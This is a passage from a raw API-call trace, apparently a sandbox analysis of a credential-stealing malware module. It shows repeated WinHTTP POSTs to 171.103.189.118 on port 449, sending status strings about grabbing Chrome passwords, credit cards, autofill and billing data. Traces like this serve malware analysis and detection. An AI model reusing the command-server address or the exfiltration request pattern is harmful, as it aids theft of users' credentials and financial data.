lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.328] WinHttpOpenRequest (hConnect=0x338c8ba0, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x337c60e0 [0180.328] WinHttpSetOption (hInternet=0x337c60e0, dwOption=0x1f, lpBuffer=0x33faedb8, dwBufferLength=0x4) returned 1 [0180.328] WinHttpSendRequest (hRequest=0x337c60e0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E9696B\r\nContent-Length: 131\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32803c70*, dwOptionalLength=0x83, dwTotalLength=0x83, dwContext=0x0) returned 1 [0183.485] WinHttpReceiveResponse (hRequest=0x337c60e0, lpReserved=0x0) returned 1 [0183.486] WinHttpQueryHeaders (in: hRequest=0x337c60e0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33faedb4, lpdwBufferLength=0x33faedbc, lpdwIndex=0x0 | out: lpBuffer=0x33faedb4*, lpdwBufferLength=0x33faedbc*=0x4, lpdwIndex=0x0) returned 1 [0183.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e709b0 | out: hHeap=0x2150000) returned 1 [0183.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bc50 | out: hHeap=0x2150000) returned 1 [0183.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70830 | out: hHeap=0x2150000) returned 1 [0183.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70470 | out: hHeap=0x2150000) returned 1 [0183.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803b00 | out: hHeap=0x2150000) returned 1 [0183.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803c70 | out: hHeap=0x2150000) returned 1 [0183.486] Sleep (dwMilliseconds=0xbb8) [0186.549] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bcb0 | out: hHeap=0x2150000) returned 1 [0186.550] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803c20 | out: hHeap=0x2150000) returned 1 [0186.550] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bd50 | out: hHeap=0x2150000) returned 1 [0186.550] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e709e0 | out: hHeap=0x2150000) returned 1 [0186.550] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f30 | out: hHeap=0x2150000) returned 1 [0186.550] WinHttpCloseHandle (hInternet=0x337c60e0) returned 1 [0186.550] WinHttpCloseHandle (hInternet=0x338c8ba0) returned 1 [0186.550] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e702f0 | out: hHeap=0x2150000) returned 1 Thread: id = 105 os_tid = 0xd60 [0180.361] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c8d30 [0180.361] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70320 [0180.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab autofill data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0180.361] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e704a0 [0180.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab autofill data: ", cchWideChar=-1, lpMultiByteStr=0x32e704a0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab autofill data: ", lpUsedDefaultChar=0x0) returned 31 [0180.361] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70a10 [0180.361] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bcd0 [0180.361] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70890 [0180.362] GetTickCount () returned 0xe96999 [0180.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e723c0 [0180.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32803d10 [0180.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x3402e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.362] WinHttpOpenRequest (hConnect=0x338c8d30, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x337c64a0 [0180.362] WinHttpSetOption (hInternet=0x337c64a0, dwOption=0x1f, lpBuffer=0x3402edb8, dwBufferLength=0x4) returned 1 [0180.362] WinHttpSendRequest (hRequest=0x337c64a0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96999\r\nContent-Length: 135\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32803d10*, dwOptionalLength=0x87, dwTotalLength=0x87, dwContext=0x0) returned 1 [0183.418] WinHttpReceiveResponse (hRequest=0x337c64a0, lpReserved=0x0) returned 1 [0183.418] WinHttpQueryHeaders (in: hRequest=0x337c64a0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x3402edb4, lpdwBufferLength=0x3402edbc, lpdwIndex=0x0 | out: lpBuffer=0x3402edb4*, lpdwBufferLength=0x3402edbc*=0x4, lpdwIndex=0x0) returned 1 [0183.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70a10 | out: hHeap=0x2150000) returned 1 [0183.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bcd0 | out: hHeap=0x2150000) returned 1 [0183.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70890 | out: hHeap=0x2150000) returned 1 [0183.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e704a0 | out: hHeap=0x2150000) returned 1 [0183.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e723c0 | out: hHeap=0x2150000) returned 1 [0183.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803d10 | out: hHeap=0x2150000) returned 1 [0183.418] Sleep (dwMilliseconds=0xbb8) [0186.435] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234baf0 | out: hHeap=0x2150000) returned 1 [0186.435] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e72370 | out: hHeap=0x2150000) returned 1 [0186.435] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bab0 | out: hHeap=0x2150000) returned 1 [0186.435] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70500 | out: hHeap=0x2150000) returned 1 [0186.435] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0186.435] WinHttpCloseHandle (hInternet=0x337c64a0) returned 1 [0186.435] WinHttpCloseHandle (hInternet=0x338c8d30) returned 1 [0186.435] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70320 | out: hHeap=0x2150000) returned 1 Thread: id = 106 os_tid = 0x7dc [0180.393] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c9500 [0180.393] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70770 [0180.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab credit card data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0180.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0180.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab credit card data: ", cchWideChar=-1, lpMultiByteStr=0x32e64e30, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab credit card data: ", lpUsedDefaultChar=0x0) returned 34 [0180.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d30 [0180.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234beb0 [0180.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70350 [0180.394] GetTickCount () returned 0xe969a9 [0180.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e724d0 [0180.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e725e0 [0180.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x340ae750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.394] WinHttpOpenRequest (hConnect=0x338c9500, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x337c6860 [0180.394] WinHttpSetOption (hInternet=0x337c6860, dwOption=0x1f, lpBuffer=0x340aedb8, dwBufferLength=0x4) returned 1 [0180.395] WinHttpSendRequest (hRequest=0x337c6860, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E969A9\r\nContent-Length: 138\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e725e0*, dwOptionalLength=0x8a, dwTotalLength=0x8a, dwContext=0x0) returned 1 [0184.100] WinHttpReceiveResponse (hRequest=0x337c6860, lpReserved=0x0) returned 1 [0184.100] WinHttpQueryHeaders (in: hRequest=0x337c6860, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x340aedb4, lpdwBufferLength=0x340aedbc, lpdwIndex=0x0 | out: lpBuffer=0x340aedb4*, lpdwBufferLength=0x340aedbc*=0x4, lpdwIndex=0x0) returned 1 [0184.100] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d30 | out: hHeap=0x2150000) returned 1 [0184.100] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234beb0 | out: hHeap=0x2150000) returned 1 [0184.100] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70350 | out: hHeap=0x2150000) returned 1 [0184.100] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0184.101] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e724d0 | out: hHeap=0x2150000) returned 1 [0184.115] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e725e0 | out: hHeap=0x2150000) returned 1 [0184.115] Sleep (dwMilliseconds=0xbb8) [0187.118] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bbd0 | out: hHeap=0x2150000) returned 1 [0187.118] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e722e0 | out: hHeap=0x2150000) returned 1 [0187.118] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b870 | out: hHeap=0x2150000) returned 1 [0187.118] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70920 | out: hHeap=0x2150000) returned 1 [0187.118] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0187.118] WinHttpCloseHandle (hInternet=0x337c6860) returned 1 [0187.118] WinHttpCloseHandle (hInternet=0x338c9500) returned 1 [0187.118] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70770 | out: hHeap=0x2150000) returned 1 Thread: id = 107 os_tid = 0xe74 [0180.442] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c99b0 [0180.442] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70aa0 [0180.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab billing info data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0180.442] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0180.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab billing info data: ", cchWideChar=-1, lpMultiByteStr=0x32e64ff0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab billing info data: ", lpUsedDefaultChar=0x0) returned 35 [0180.442] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0180.442] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bed0 [0180.442] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703b0 [0180.442] GetTickCount () returned 0xe969e8 [0180.442] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e71ed0 [0180.442] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e72050 [0180.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x3412e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.442] WinHttpOpenRequest (hConnect=0x338c99b0, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x337c6c20 [0180.442] WinHttpSetOption (hInternet=0x337c6c20, dwOption=0x1f, lpBuffer=0x3412edb8, dwBufferLength=0x4) returned 1 [0180.442] WinHttpSendRequest (hRequest=0x337c6c20, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E969E8\r\nContent-Length: 139\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e72050*, dwOptionalLength=0x8b, dwTotalLength=0x8b, dwContext=0x0) returned 1 [0185.717] WinHttpReceiveResponse (hRequest=0x337c6c20, lpReserved=0x0) returned 1 [0185.717] WinHttpQueryHeaders (in: hRequest=0x337c6c20, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x3412edb4, lpdwBufferLength=0x3412edbc, lpdwIndex=0x0 | out: lpBuffer=0x3412edb4*, lpdwBufferLength=0x3412edbc*=0x4, lpdwIndex=0x0) returned 1 [0185.717] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0185.718] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bed0 | out: hHeap=0x2150000) returned 1 [0185.718] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e703b0 | out: hHeap=0x2150000) returned 1 [0185.718] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0185.718] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71ed0 | out: hHeap=0x2150000) returned 1 [0185.725] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e72050 | out: hHeap=0x2150000) returned 1 [0185.725] Sleep (dwMilliseconds=0xbb8) [0188.725] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bb30 | out: hHeap=0x2150000) returned 1 [0188.725] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71ff0 | out: hHeap=0x2150000) returned 1 [0188.726] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bb10 | out: hHeap=0x2150000) returned 1 [0188.726] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70380 | out: hHeap=0x2150000) returned 1 [0188.726] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65130 | out: hHeap=0x2150000) returned 1 [0188.726] WinHttpCloseHandle (hInternet=0x337c6c20) returned 1 [0188.726] WinHttpCloseHandle (hInternet=0x338c99b0) returned 1 [0188.726] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70aa0 | out: hHeap=0x2150000) returned 1 Thread: id = 108 os_tid = 0x720 [0180.472] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c8ec0 [0180.472] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70a40 [0180.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(): Can't open database", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.473] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0180.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(): Can't open database", cchWideChar=-1, lpMultiByteStr=0x32e64bf0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grab_Passwords_Chrome(): Can't open database", lpUsedDefaultChar=0x0) returned 45 [0180.473] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0180.473] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bcf0 [0180.473] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70050 [0180.473] GetTickCount () returned 0xe96a07 [0180.473] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e720f0 [0180.473] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xa0) returned 0x32e652b0 [0180.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x341ae750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.473] WinHttpOpenRequest (hConnect=0x338c8ec0, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DEBG//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x337c51e0 [0180.474] WinHttpSetOption (hInternet=0x337c51e0, dwOption=0x1f, lpBuffer=0x341aedb8, dwBufferLength=0x4) returned 1 [0180.474] WinHttpSendRequest (hRequest=0x337c51e0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96A07\r\nContent-Length: 149\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e652b0*, dwOptionalLength=0x95, dwTotalLength=0x95, dwContext=0x0) returned 1 [0185.764] WinHttpReceiveResponse (hRequest=0x337c51e0, lpReserved=0x0) returned 1 [0185.764] WinHttpQueryHeaders (in: hRequest=0x337c51e0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x341aedb4, lpdwBufferLength=0x341aedbc, lpdwIndex=0x0 | out: lpBuffer=0x341aedb4*, lpdwBufferLength=0x341aedbc*=0x4, lpdwIndex=0x0) returned 1 [0185.764] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0185.764] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bcf0 | out: hHeap=0x2150000) returned 1 [0185.764] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70050 | out: hHeap=0x2150000) returned 1 [0185.764] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0185.764] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e720f0 | out: hHeap=0x2150000) returned 1 [0185.764] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e652b0 | out: hHeap=0x2150000) returned 1 [0185.764] Sleep (dwMilliseconds=0xbb8) [0188.767] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bb50 | out: hHeap=0x2150000) returned 1 [0188.767] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e72210 | out: hHeap=0x2150000) returned 1 [0188.767] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b770 | out: hHeap=0x2150000) returned 1 [0188.767] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e705f0 | out: hHeap=0x2150000) returned 1 [0188.767] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0188.767] WinHttpCloseHandle (hInternet=0x337c51e0) returned 1 [0188.767] WinHttpCloseHandle (hInternet=0x338c8ec0) returned 1 [0188.767] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70a40 | out: hHeap=0x2150000) returned 1 Thread: id = 109 os_tid = 0xb0 [0180.506] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c9050 [0180.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70a70 [0180.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unable to open database file", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0180.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e700b0 [0180.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unable to open database file", cchWideChar=-1, lpMultiByteStr=0x32e700b0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unable to open database file", lpUsedDefaultChar=0x0) returned 29 [0180.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70ad0 [0180.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bd10 [0180.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70080 [0180.506] GetTickCount () returned 0xe96a26 [0180.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e65360 [0180.507] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e65470 [0180.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x3422e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.507] WinHttpOpenRequest (hConnect=0x338c9050, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DEBG//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x337c55a0 [0180.507] WinHttpSetOption (hInternet=0x337c55a0, dwOption=0x1f, lpBuffer=0x3422edb8, dwBufferLength=0x4) returned 1 [0180.507] WinHttpSendRequest (hRequest=0x337c55a0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96A26\r\nContent-Length: 133\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e65470*, dwOptionalLength=0x85, dwTotalLength=0x85, dwContext=0x0) returned 1 [0185.725] WinHttpReceiveResponse (hRequest=0x337c55a0, lpReserved=0x0) returned 1 [0185.725] WinHttpQueryHeaders (in: hRequest=0x337c55a0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x3422edb4, lpdwBufferLength=0x3422edbc, lpdwIndex=0x0 | out: lpBuffer=0x3422edb4*, lpdwBufferLength=0x3422edbc*=0x4, lpdwIndex=0x0) returned 1 [0185.725] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70ad0 | out: hHeap=0x2150000) returned 1 [0185.725] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bd10 | out: hHeap=0x2150000) returned 1 [0185.725] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70080 | out: hHeap=0x2150000) returned 1 [0185.725] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e700b0 | out: hHeap=0x2150000) returned 1 [0185.725] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65360 | out: hHeap=0x2150000) returned 1 [0185.725] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65470 | out: hHeap=0x2150000) returned 1 [0185.725] Sleep (dwMilliseconds=0xbb8) [0188.727] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bb70 | out: hHeap=0x2150000) returned 1 [0188.727] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e72280 | out: hHeap=0x2150000) returned 1 [0188.727] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b810 | out: hHeap=0x2150000) returned 1 [0188.727] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e704d0 | out: hHeap=0x2150000) returned 1 [0188.727] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651b0 | out: hHeap=0x2150000) returned 1 [0188.727] WinHttpCloseHandle (hInternet=0x337c55a0) returned 1 [0188.727] WinHttpCloseHandle (hInternet=0x338c9050) returned 1 [0188.727] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70a70 | out: hHeap=0x2150000) returned 1 Thread: id = 110 os_tid = 0x1348 [0180.521] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c9370 [0180.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70b00 [0180.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab passwords: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0180.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e700e0 [0180.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab passwords: ", cchWideChar=-1, lpMultiByteStr=0x32e700e0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab passwords: ", lpUsedDefaultChar=0x0) returned 27 [0180.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70b30 [0180.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bd70 [0180.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70110 [0180.521] GetTickCount () returned 0xe96a36 [0180.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e76710 [0180.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e65a90 [0180.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x342ae750, cbMultiByte=1024, 